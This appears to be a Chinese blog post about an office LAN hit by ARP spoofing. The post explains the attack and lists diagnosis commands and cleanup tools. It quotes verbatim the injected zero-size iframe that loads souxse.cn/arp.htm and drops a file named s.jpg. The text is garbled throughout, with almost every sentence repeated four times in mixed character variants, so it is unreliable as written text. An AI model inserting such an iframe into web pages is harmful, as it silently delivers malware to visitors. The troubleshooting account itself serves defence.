我的電腦的瀏覽器中毒了， 看每個網頁， 源代碼前面都會被自動加了一段“<iframesrc='http://www.souxse.cn/arp.htm'width=0height=0></ iframe>”這樣的代碼， 請問是什么問題？

這段iframe的代碼指向網站后， 會下載一個s.jpg的文件到臨時文件夾， 這個是什么木馬文件嗎？ 這段iframe的代碼指向網站后， 會下載一個s.jpg的文件到臨時文件夾， 這個是什么木馬文件嗎？ 這段iframe的代碼指向網站後， 會下載一個s.jpg的文件到臨時文件夾， 這個是什麼木馬文件嗎？ 這段iframe的代碼指向網站后， 會下載一個s.jpg的文件到臨時文件夾， 這個是什么木馬文件嗎？

我已經試過以下殺毒方法：我已經試過以下殺毒方法： 我已經試過以下殺毒方法：我已經試過以下殺毒方法：

1、卡巴斯基－－可以檢測， 選擇阻止， 但殺不了。 1、卡巴斯基－－可以檢測， 選擇阻止， 但殺不了。 1、卡巴斯基－－可以檢測， 選擇阻止， 但殺不了。 1、卡巴斯基－－可以檢測， 選擇阻止， 但殺不了。

2、瑞星——可以檢測， 選擇阻止， 但殺不了。 2、瑞星——可以檢測， 選擇阻止， 但殺不了。 2、瑞星——可以檢測， 選擇阻止， 但殺不了。 2、瑞星——可以檢測， 選擇阻止， 但殺不了。

3、Norton——可以檢測， 選擇阻止， 但殺不了。 3、Norton——可以檢測， 選擇阻止， 但殺不了。 3、Norton——可以檢測， 選擇阻止， 但殺不了。 3、Norton——可以檢測， 選擇阻止， 但殺不了。

4、Mcafee——可以檢測， 選擇阻止， 可以刪除文件。 4、Mcafee——可以檢測， 選擇阻止， 可以刪除文件。 4、Mcafee——可以檢測， 選擇阻止， 可以刪除文件。 4、Mcafee——可以檢測， 選擇阻止， 可以刪除文件。 但只要再開一個新的頁面， 又會重新下載的。 但只要再開一個新的頁面， 又會重新下載的。 但只要再開一個新的頁面， 又會重新下載的。 但只要再開一個新的頁面， 又會重新下載的。

最麻煩的是， 這個東西已經在我公司的局域網里面開始蔓延， 已經另外有四臺感染， 其中包括98系統的。 最麻煩的是， 這個東西已經在我公司的局域網里面開始蔓延， 已經另外有四臺感染， 其中包括98系統的。 最麻煩的是， 這個東西已經在我公司的局域網裡面開始蔓延， 已經另外有四臺感染， 其中包括98系統的。 最麻煩的是， 這個東西已經在我公司的局域網里面開始蔓延， 已經另外有四臺感染， 其中包括98系統的。

昨晚下載了黃山ie修復器， 還有360安全衛士， 把windows的安全漏洞都打上補丁后， 在安全模式下再用這兩個東西全面清除和修復， 現在已經沒問題了， 呵呵。 昨晚下載了黃山ie修復器， 還有360安全衛士， 把windows的安全漏洞都打上補丁后， 在安全模式下再用這兩個東西全面清除和修復， 現在已經沒問題了， 呵呵。 昨晚下載了黃山ie修復器， 還有360安全衛士， 把windows的安全漏洞都打上補丁後， 在安全模式下再用這兩個東西全面清除和修復， 現在已經沒問題了， 呵呵。 昨晚下載了黃山ie修復器， 還有360安全衛士， 把windows的安全漏洞都打上補丁后， 在安全模式下再用這兩個東西全面清除和修復， 現在已經沒問題了， 呵呵。

今天早上開始， 公司局域網就很不正常， 頻繁斷網。 今天早上開始， 公司局域網就很不正常， 頻繁斷網。 今天早上開始， 公司局域網就很不正常， 頻繁斷網。 今天早上開始， 公司局域網就很不正常， 頻繁斷網。

中午休息時打開我的博客， 卡巴立即提示含有木馬病毒。 中午休息時打開我的博客， 卡巴立即提示含有木馬病毒。 中午休息時打開我的博客， 卡巴立即提示含有木馬病毒。 中午休息時打開我的博客， 卡巴立即提示含有木馬病毒。 很納悶， 難道網站被種木馬了？ 很納悶， 難道網站被種木馬了？ 很納悶， 難道網站被種木馬了？ 很納悶， 難道網站被種木馬了？ 查看網頁源代碼， 發現在頂部有這樣一行代碼， 原來是被加入了嵌套框架網頁， 進而執行此網站上的木馬程序。 查看網頁源代碼， 發現在頂部有這樣一行代碼， 原來是被加入了嵌套框架網頁， 進而執行此網站上的木馬程序。 查看網頁源代碼， 發現在頂部有這樣一行代碼， 原來是被加入了嵌套框架網頁， 進而執行此網站上的木馬程序。 查看網頁源代碼， 發現在頂部有這樣一行代碼， 原來是被加入了嵌套框架網頁， 進而執行此網站上的木馬程序。

第一反應就是登陸上FTP， 將文件下載下來查看了一遍， 沒有發現異常。 第一反應就是登陸上FTP， 將文件下載下來查看了一遍， 沒有發現異常。 第一反應就是登陸上FTP， 將文件下載下來查看了一遍， 沒有發現異常。 第一反應就是登陸上FTP， 將文件下載下來查看了一遍， 沒有發現異常。 網站文件沒問題， 應該就是數據在發送的過程中被篡改了。 網站文件沒問題， 應該就是數據在發送的過程中被篡改了。 網站文件沒問題， 應該就是數據在發送的過程中被篡改了。 網站文件沒問題， 應該就是數據在發送的過程中被篡改了。 進百度打算搜索， 卻發現百度的首頁也被加入了， 汗！ 進百度打算搜索， 卻發現百度的首頁也被加入了， 汗！ 進百度打算搜索， 卻發現百度的首頁也被加入了， 汗！ 進百度打算搜索， 卻發現百度的首頁也被加入了， 汗！ 再開Google， 暈死， 也有！ 再開Google， 暈死， 也有！ 再開Google， 暈死， 也有！ 再開Google， 暈死， 也有！ 新浪， 有！ 新浪， 有！ 新浪， 有！ 新浪， 有！ 天涯， 有！ 天涯， 有！ 天涯， 有！ 天涯， 有！ 不會這么瘋狂吧！ 不會這么瘋狂吧！ 不會這麼瘋狂吧！ 不會這么瘋狂吧！ ！ ！ ！ ！ 查找了一些資料， 才知道是ARP欺騙。 查找了一些資料， 才知道是ARP欺騙。 查找了一些資料， 才知道是ARP欺騙。 查找了一些資料， 才知道是ARP欺騙。

找到一些解決的方法， 稍微整理了一下。 找到一些解決的方法， 稍微整理了一下。 找到一些解決的方法， 稍微整理了一下。 找到一些解決的方法， 稍微整理了一下。

一、什么是“ARP欺騙”？ 一、什么是“ARP欺騙”？ 一、什麼是“ARP欺騙”？ 一、什么是“ARP欺騙”？

ARP的意思是Address Resolution Protocol（地址解析協議）， 它是一個位于TCP/IP協議棧中的低層協議， 負責將某個IP地址解析成對應的MAC地址。 ARP的意思是AddressResolutionProtocol（地址解析協議）， 它是一個位于TCP/IP協議棧中的低層協議， 負責將某個IP地址解析成對應的MAC地址。 ARP的意思是AddressResolutionProtocol（地址解析協議）， 它是一個位於TCP/IP協議棧中的低層協議， 負責將某個IP地址解析成對應的MAC地址。 ARP的意思是AddressResolutionProtocol（地址解析協議）， 它是一個位于TCP/IP協議棧中的低層協議， 負責將某個IP地址解析成對應的MAC地址。

從影響網絡連接通暢的方式來看， ARP欺騙分為二種， 一種是對路由器ARP表的欺騙；另一種是對內網PC的網關欺騙。 從影響網絡連接通暢的方式來看， ARP欺騙分為二種， 一種是對路由器ARP表的欺騙；另一種是對內網PC的網關欺騙。 從影響網絡連接通暢的方式來看， ARP欺騙分為二種， 一種是對路由器ARP表的欺騙；另一種是對內網PC的網關欺騙。 從影響網絡連接通暢的方式來看， ARP欺騙分為二種， 一種是對路由器ARP表的欺騙；另一種是對內網PC的網關欺騙。

第一種ARP欺騙的原理是——截獲網關數據。 第一種ARP欺騙的原理是——截獲網關數據。 第一種ARP欺騙的原理是——截獲網關數據。 第一種ARP欺騙的原理是——截獲網關數據。 它通知路由器一系列錯誤的內網MAC地址， 并按照一定的頻率不斷進行， 使真實的地址信息無法通過更新保存在路由器中， 結果路由器的所有數據只能發送給錯誤的MAC地址， 造成正常PC無法收到信息。 它通知路由器一系列錯誤的內網MAC地址， 并按照一定的頻率不斷進行， 使真實的地址信息無法通過更新保存在路由器中， 結果路由器的所有數據只能發送給錯誤的MAC地址， 造成正常PC無法收到信息。 它通知路由器一系列錯誤的內網MAC地址， 並按照一定的頻率不斷進行， 使真實的地址信息無法通過更新保存在路由器中， 結果路由器的所有數據只能發送給錯誤的MAC地址， 造成正常PC無法收到信息。 它通知路由器一系列錯誤的內網MAC地址， 并按照一定的頻率不斷進行， 使真實的地址信息無法通過更新保存在路由器中， 結果路由器的所有數據只能發送給錯誤的MAC地址， 造成正常PC無法收到信息。

第二種ARP欺騙的原理是——偽造網關。 第二種ARP欺騙的原理是——偽造網關。 第二種ARP欺騙的原理是——偽造網關。 第二種ARP欺騙的原理是——偽造網關。 它的原理是建立假網關， 讓被它欺騙的PC向假網關發數據， 而不是通過正常的路由器途徑上網。 它的原理是建立假網關， 讓被它欺騙的PC向假網關發數據， 而不是通過正常的路由器途徑上網。 它的原理是建立假網關， 讓被它欺騙的PC向假網關發數據， 而不是通過正常的路由器途徑上網。 它的原理是建立假網關， 讓被它欺騙的PC向假網關發數據， 而不是通過正常的路由器途徑上網。 在PC看來， 就是上不了網了， “網絡掉線了”。 在PC看來， 就是上不了網了， “網絡掉線了”。 在PC看來， 就是上不了網了， “網絡掉線了”。 在PC看來， 就是上不了網了， “網絡掉線了”。 ARP欺騙木馬只需成功感染一臺電腦， 就可能導致整個局域網都無法上網， 嚴重的甚至可能帶來整個網絡的癱瘓。 ARP欺騙木馬只需成功感染一臺電腦， 就可能導致整個局域網都無法上網， 嚴重的甚至可能帶來整個網絡的癱瘓。 ARP欺騙木馬只需成功感染一臺電腦， 就可能導致整個局域網都無法上網， 嚴重的甚至可能帶來整個網絡的癱瘓。 ARP欺騙木馬只需成功感染一臺電腦， 就可能導致整個局域網都無法上網， 嚴重的甚至可能帶來整個網絡的癱瘓。

這次是公司局域網中某臺電腦中了木馬， 造成局域網內的ARP欺騙， 使得瀏覽網頁時會自動在頁面頂部加入 iframe 代碼。 這次是公司局域網中某臺電腦中了木馬， 造成局域網內的ARP欺騙， 使得瀏覽網頁時會自動在頁面頂部加入iframe代碼。 這次是公司局域網中某臺電腦中了木馬， 造成局域網內的ARP欺騙， 使得瀏覽網頁時會自動在頁面頂部加入iframe代碼。 這次是公司局域網中某臺電腦中了木馬， 造成局域網內的ARP欺騙， 使得瀏覽網頁時會自動在頁面頂部加入iframe代碼。

二、故障現象及原因分析二、故障現象及原因分析 二、故障現象及原因分析二、故障現象及原因分析

情況一、當局域網內某臺主機感染了ARP病毒時， 會向本局域網內（指某一網段， 比如10.15.3.0這一段）所有主機發送ARP欺騙攻擊， 讓原本流向網絡中心的流量改道流向病毒主機， 并通過病毒主機代理上網。 情況一、當局域網內某臺主機感染了ARP病毒時， 會向本局域網內（指某一網段， 比如10.15.3.0這一段）所有主機發送ARP欺騙攻擊， 讓原本流向網絡中心的流量改道流向病毒主機， 并通過病毒主機代理上網。 情況一、當局域網內某臺主機感染了ARP病毒時， 會向本局域網內（指某一網段， 比如10.15.3.0這一段）所有主機發送ARP欺騙攻擊， 讓原本流向網絡中心的流量改道流向病毒主機， 並通過病毒主機代理上網。 情況一、當局域網內某臺主機感染了ARP病毒時， 會向本局域網內（指某一網段， 比如10.15.3.0這一段）所有主機發送ARP欺騙攻擊， 讓原本流向網絡中心的流量改道流向病毒主機， 并通過病毒主機代理上網。 因客戶端具有防代理功能， 造成受害者無法通過病毒主機上網。 因客戶端具有防代理功能， 造成受害者無法通過病毒主機上網。 因客戶端具有防代理功能， 造成受害者無法通過病毒主機上網。 因客戶端具有防代理功能， 造成受害者無法通過病毒主機上網。

由于病毒發作時發出大量數據包會將網絡擁塞， 大家會感覺上網速度越來越慢。 由于病毒發作時發出大量數據包會將網絡擁塞， 大家會感覺上網速度越來越慢。 由於病毒發作時發出大量數據包會將網絡擁塞， 大家會感覺上網速度越來越慢。 由于病毒發作時發出大量數據包會將網絡擁塞， 大家會感覺上網速度越來越慢。 中毒者同樣如此， 受其自身處理能力的限制， 感覺運行速度很慢時， 可能會采取重新啟動或其他措施。 中毒者同樣如此， 受其自身處理能力的限制， 感覺運行速度很慢時， 可能會采取重新啟動或其他措施。 中毒者同樣如此， 受其自身處理能力的限制， 感覺運行速度很慢時， 可能會採取重新啟動或其他措施。 中毒者同樣如此， 受其自身處理能力的限制， 感覺運行速度很慢時， 可能會采取重新啟動或其他措施。 此時病毒短時間停止工作， 大家會感到網絡恢復正常。 此時病毒短時間停止工作， 大家會感到網絡恢復正常。 此時病毒短時間停止工作， 大家會感到網絡恢復正常。 此時病毒短時間停止工作， 大家會感到網絡恢復正常。 如此反復， 就造成網絡時斷時續。 如此反復， 就造成網絡時斷時續。 如此反覆， 就造成網絡時斷時續。 如此反覆， 就造成網絡時斷時續。

情況二、局域網內有某些用戶使用了ARP欺騙程序（如：網絡執法官、網絡剪刀手、傳奇木馬、QQ盜號軟件等）發送ARP欺騙數據包， 致使被攻擊的電腦出現突然不能上網， 過一段時間又能上網， 反復掉線的現象。 情況二、局域網內有某些用戶使用了ARP欺騙程序（如：網絡執法官、網絡剪刀手、傳奇木馬、QQ盜號軟件等）發送ARP欺騙數據包， 致使被攻擊的電腦出現突然不能上網， 過一段時間又能上網， 反復掉線的現象。 情況二、局域網內有某些用戶使用了ARP欺騙程序（如：網絡執法官、網絡剪刀手、傳奇木馬、QQ盜號軟件等）發送ARP欺騙數據包， 致使被攻擊的電腦出現突然不能上網， 過一段時間又能上網， 反覆掉線的現象。 情況二、局域網內有某些用戶使用了ARP欺騙程序（如：網絡執法官、網絡剪刀手、傳奇木馬、QQ盜號軟件等）發送ARP欺騙數據包， 致使被攻擊的電腦出現突然不能上網， 過一段時間又能上網， 反覆掉線的現象。

三、故障診斷三、故障診斷 三、故障診斷三、故障診斷

如果發現以上疑似情況， 可以通過如下操作進行診斷：點擊”開始”按鈕->選擇”運行”->輸入”arp -d”->點擊”確定”按鈕， 然后重新嘗試上網， 如果能恢復正常， 則說明此次掉線可能是受ARP欺騙所致。 如果發現以上疑似情況， 可以通過如下操作進行診斷：點擊”開始”按鈕->選擇”運行”->輸入”arp-d”->點擊”確定”按鈕， 然后重新嘗試上網， 如果能恢復正常， 則說明此次掉線可能是受ARP欺騙所致。 如果發現以上疑似情況， 可以通過如下操作進行診斷：點擊”開始”按鈕->選擇”運行”->輸入”arp-d”->點擊”確定”按鈕， 然後重新嘗試上網， 如果能恢復正常， 則說明此次掉線可能是受ARP欺騙所致。 如果發現以上疑似情況， 可以通過如下操作進行診斷：點擊”開始”按鈕->選擇”運行”->輸入”arp-d”->點擊”確定”按鈕， 然后重新嘗試上網， 如果能恢復正常， 則說明此次掉線可能是受ARP欺騙所致。 注：”arp -d”命令用于清除并重建本機arp表。 注：”arp-d”命令用于清除并重建本機arp表。 注：”arp-d”命令用於清除並重建本機arp表。 注：”arp-d”命令用于清除并重建本機arp表。 ”arp -d”命令并不能抵御ARP欺騙， 執行后仍有可能再次遭受ARP攻擊。 ”arp-d”命令并不能抵御ARP欺騙， 執行后仍有可能再次遭受ARP攻擊。 ”arp-d”命令並不能抵禦ARP欺騙， 執行後仍有可能再次遭受ARP攻擊。 ”arp-d”命令并不能抵御ARP欺騙， 執行后仍有可能再次遭受ARP攻擊。

四、故障處理四、故障處理 四、故障處理四、故障處理

1、中毒者：使用趨勢科技ARP病毒專殺工具查殺病毒（已提供下載） 1、中毒者：使用趨勢科技ARP病毒專殺工具查殺病毒（已提供下載） 1、中毒者：使用趨勢科技ARP病毒專殺工具查殺病毒（已提供下載） 1、中毒者：使用趨勢科技ARP病毒專殺工具查殺病毒（已提供下載）

下載后解壓縮， 運行包內TSC.exe文件， 不要關讓它一直運行完， 最后查看report文檔便知是否中毒。 下載后解壓縮， 運行包內TSC.exe文件， 不要關讓它一直運行完， 最后查看report文檔便知是否中毒。 下載後解壓縮， 運行包內TSC.exe文件， 不要關讓它一直運行完， 最後查看report文檔便知是否中毒。 下載后解壓縮， 運行包內TSC.exe文件， 不要關讓它一直運行完， 最后查看report文檔便知是否中毒。

2、被害者：使用AntiArp軟件抵御ARP攻擊（已提供下載） 2、被害者：使用AntiArp軟件抵禦ARP攻擊（已提供下載） 2、被害者：使用AntiArp軟件抵御ARP攻擊（已提供下載） 2、被害者：使用AntiArp軟件抵御ARP攻擊（已提供下載）

運行AntiArp。 運行AntiArp。 運行AntiArp。 運行AntiArp。 輸入本網段的網關ip地址后， 點擊”獲取網關MAC地址”， 檢查網關IP地址和MAC地址無誤后， 點擊”自動保護”。 輸入本網段的網關ip地址后， 點擊”獲取網關MAC地址”， 檢查網關IP地址和MAC地址無誤后， 點擊”自動保護”。 輸入本網段的網關ip地址後， 點擊”獲取網關MAC地址”， 檢查網關IP地址和MAC地址無誤後， 點擊”自動保護”。 輸入本網段的網關ip地址后， 點擊”獲取網關MAC地址”， 檢查網關IP地址和MAC地址無誤后， 點擊”自動保護”。 若不知道網關IP地址， 可通過以下操作獲取：點擊”開始”按鈕->選擇”運行”->輸入”cmd”點擊”確定”->輸入”ipconfig”按回車， ”Default Gateway”后的IP地址就是網關地址。 若不知道網關IP地址， 可通過以下操作獲取：點擊”開始”按鈕->選擇”運行”->輸入”cmd”點擊”確定”->輸入”ipconfig”按回車， ”DefaultGateway”后的IP地址就是網關地址。 若不知道網關IP地址， 可通過以下操作獲取：點擊”開始”按鈕->選擇”運行”->輸入”cmd”點擊”確定”->輸入”ipconfig”按回車， ”DefaultGateway”後的IP地址就是網關地址。 若不知道網關IP地址， 可通過以下操作獲取：點擊”開始”按鈕->選擇”運行”->輸入”cmd”點擊”確定”->輸入”ipconfig”按回車， ”DefaultGateway”后的IP地址就是網關地址。 AntiArp軟件會在提示框內出現病毒主機的MAC地址。 AntiArp軟件會在提示框內出現病毒主機的MAC地址。 AntiArp軟件會在提示框內出現病毒主機的MAC地址。 AntiArp軟件會在提示框內出現病毒主機的MAC地址。

這次算是領教了ARP， 呵呵。 這次算是領教了ARP， 呵呵。 這次算是領教了ARP， 呵呵。 這次算是領教了ARP， 呵呵。